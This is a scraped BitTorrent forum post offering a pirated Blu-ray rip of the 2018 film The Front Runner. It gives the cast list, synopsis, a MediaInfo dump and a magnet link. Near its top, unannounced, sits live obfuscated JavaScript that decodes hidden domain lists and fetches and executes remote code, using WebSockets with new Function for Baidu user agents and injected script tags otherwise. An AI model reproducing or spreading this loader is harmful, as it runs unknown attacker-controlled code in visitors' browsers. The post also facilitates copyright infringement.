领先者[双语字幕]The.Front.Runner.2018.1080p.BluRay.x264.DTS-迅雷下载 12.40GB

版主小s 17天前 119

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 领先者 / The Frontrunner / 爆料世代(台) / 选战谎情色(港)

◎片 名 The Front Runner

◎年 代 2018

◎产 地 美国

◎类 别 剧情 / 传记 / 历史

◎语 言 英语

◎上映日期 2018-08-31(特柳赖德电影节) / 2018-11-21(美国)

◎IMDb评分 6.1/10 from 11888 users

◎IMDb链接 https://www.imdb.com/title/tt7074886

◎豆瓣评分 6.0/10 from 927 users

◎豆瓣链接 https://movie.douban.com/subject/27077783/

◎片 长 113分钟

◎导 演 贾森·雷特曼 Jason Reitman

◎编 剧 贾森·雷特曼 Jason Reitman / 杰伊·卡森 Jay Carson / 马特·白 Matt Bai

◎主 演 休·杰克曼 Hugh Jackman

维拉·法米加 Vera Farmiga

J·K·西蒙斯 J.K. Simmons

马克·奥布莱恩 Mark O'Brien

莫莉·伊法莲 Molly Ephraim

克里斯·科伊 Chris Coy

亚历克斯·卡普夫斯基 Alex Karpovsky

乔什·布雷纳 Josh Brener

汤米·杜威 Tommy Dewey

凯特琳·德弗 Kaitlyn Dever

奥利弗·库珀 Oliver Cooper

珍娜·凯内尔 Jenna Kanell

阿尔弗雷德·莫里纳 Alfred Molina

马莫多·阿西 Mamoudou Athie

艾莉·葛瑞那 Ari Graynor

约翰·贝德福德·劳埃德 John Bedford Lloyd

斯蒂芬·考特尔 Steve Coulter

斯宾塞·加雷特 Spencer Garrett

史蒂夫·齐西斯 Steve Zissis

比尔·伯尔 Bill Burr

凯文·波拉克 Kevin Pollak

迈克·乔吉 Mike Judge

尼亚切·海邓迪 Nyasha Hatendi

萨拉·帕克斯顿 Sara Paxton

托比·哈斯 Toby Huss

考特妮·福特 Courtney Ford

兰德尔·P·海文斯 Randall P. Havens

詹妮弗·兰登 Jennifer Landon

乔·克里斯特 Joe Chrest

约翰尼·帕斯沃尔斯基 Jonny Pasvolsky

杰夫·维特兹克 Jeff Witzke

埃文·卡斯特罗 Evan Castelloe

斯蒂芬妮·阿琳 Stephanie Allynne

丹尼尔·姜 Daniel Kang

维克托·麦凯 Victor McCay

肯德里克·克罗斯 Kendrick Cross

马特·白 Matt Bai

巴特·汉萨德 Bart Hansard

凯蒂·宾克利 Kathi Binkley

露西·卡罗尔 Lucie Carroll

马修·埃瓦尔德 Matthew Ewald

杰夫科斯·格林 Jevocas Green

罗伯特·哈奇 Robert Hatch

巴迪·沃特金斯 Buddy Watkins

◎标 签 美国 | 传记 | 政治 | 剧情 | 2018 | 真实事件改编 | 历史 | 媒体

◎简 介

影片改编自真实故事,聚焦1988年美国民主党总统候选人加里·哈特(杰克曼饰)风光一时,却因丑闻戏剧性落败的故事。法米加将在片中出演加里·哈特妻子,西蒙斯扮演加里·哈特的竞选经理。

◎获奖情况

第22届好莱坞电影奖(2018)

年度男主角 休·杰克曼

第17届华盛顿影评人协会奖(2018)

华盛顿特区最佳写照(提名)

  1. General

  2. Unique ID : 244487754621700687949997451382161920131 (0xB7EEA0F6D23CB2B0EEA23B74CB8FD083)

  3. Complete name : The.Front.Runner.2018.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 12.4 GiB

  7. Duration : 1 h 53 min

  8. Overall bit rate : 15.6 Mb/s

  9. Movie name : The Front Runner 2018

  10. Encoded date : UTC 2021-07-06 10:47:21

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 53 min

  25. Bit rate : 14.0 Mb/s

  26. Width : 1 920 pixels

  27. Height : 1 036 pixels

  28. Display aspect ratio : 1.85:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.294

  36. Stream size : 11.1 GiB (90%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=32 / lookahead_threads=8 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=18.5000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Language : English

  40. Default : Yes

  41. Forced : No


  42. Audio

  43. ID : 2

  44. ID in the original source medium : 4352 (0x1100)

  45. Format : DTS

  46. Format/Info : Digital Theater Systems

  47. Codec ID : A_DTS

  48. Duration : 1 h 53 min

  49. Bit rate mode : Constant

  50. Bit rate : 1 509 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 16 bits

  56. Compression mode : Lossy

  57. Stream size : 1.20 GiB (10%)

  58. Language : English

  59. Default : Yes

  60. Forced : No

  61. Original source medium : Blu-ray


  62. Text #1

  63. ID : 3

  64. ID in the original source medium : 4611 (0x1203)

  65. Format : PGS

  66. Muxing mode : zlib

  67. Codec ID : S_HDMV/PGS

  68. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  69. Duration : 1 h 44 min

  70. Bit rate : 39.2 kb/s

  71. Count of elements : 3671

  72. Stream size : 29.4 MiB (0%)

  73. Title : chs&eng

  74. Language : Chinese

  75. Default : Yes

  76. Forced : No

  77. Original source medium : Blu-ray


  78. Text #2

  79. ID : 4

  80. ID in the original source medium : 4612 (0x1204)

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 44 min

  86. Bit rate : 72.6 kb/s

  87. Count of elements : 3671

  88. Stream size : 54.3 MiB (0%)

  89. Title : cht&eng

  90. Language : Chinese

  91. Default : No

  92. Forced : No

  93. Original source medium : Blu-ray


  94. Text #3

  95. ID : 5

  96. ID in the original source medium : 4613 (0x1205)

  97. Format : PGS

  98. Muxing mode : zlib

  99. Codec ID : S_HDMV/PGS

  100. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  101. Duration : 1 h 44 min

  102. Bit rate : 39.6 kb/s

  103. Count of elements : 3671

  104. Stream size : 29.7 MiB (0%)

  105. Title : chs

  106. Language : Chinese

  107. Default : No

  108. Forced : No

  109. Original source medium : Blu-ray


  110. Text #4

  111. ID : 6

  112. ID in the original source medium : 4614 (0x1206)

  113. Format : PGS

  114. Muxing mode : zlib

  115. Codec ID : S_HDMV/PGS

  116. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration : 1 h 44 min

  118. Bit rate : 73.0 kb/s

  119. Count of elements : 3671

  120. Stream size : 54.6 MiB (0%)

  121. Title : cht

  122. Language : Chinese

  123. Default : No

  124. Forced : No

  125. Original source medium : Blu-ray


  126. Text #5

  127. ID : 7

  128. ID in the original source medium : 4608 (0x1200)

  129. Format : PGS

  130. Muxing mode : zlib

  131. Codec ID : S_HDMV/PGS

  132. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  133. Duration : 1 h 47 min

  134. Bit rate : 62.8 kb/s

  135. Count of elements : 4424

  136. Stream size : 48.2 MiB (0%)

  137. Language : English

  138. Default : No

  139. Forced : No

  140. Original source medium : Blu-ray


  141. Menu

  142. 00:00:00.000 : Chapter 01

  143. 00:08:02.607 : Chapter 02

  144. 00:14:56.812 : Chapter 03

  145. 00:19:32.504 : Chapter 04

  146. 00:27:22.932 : Chapter 05

  147. 00:34:31.944 : Chapter 06

  148. 00:40:30.428 : Chapter 07

  149. 00:45:55.961 : Chapter 08

  150. 00:51:07.314 : Chapter 09

  151. 00:58:52.111 : Chapter 10

  152. 01:09:05.933 : Chapter 11

  153. 01:15:57.761 : Chapter 12

  154. 01:22:31.655 : Chapter 13

  155. 01:29:28.738 : Chapter 14

  156. 01:34:40.508 : Chapter 15

  157. 01:41:31.919 : Chapter 16



TAGS 剧情 历史 传记

磁力链:
  • magnet:?xt=urn:btih:7EE09B7383DE5949ACDEACEB57CFD25C4ECED037
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回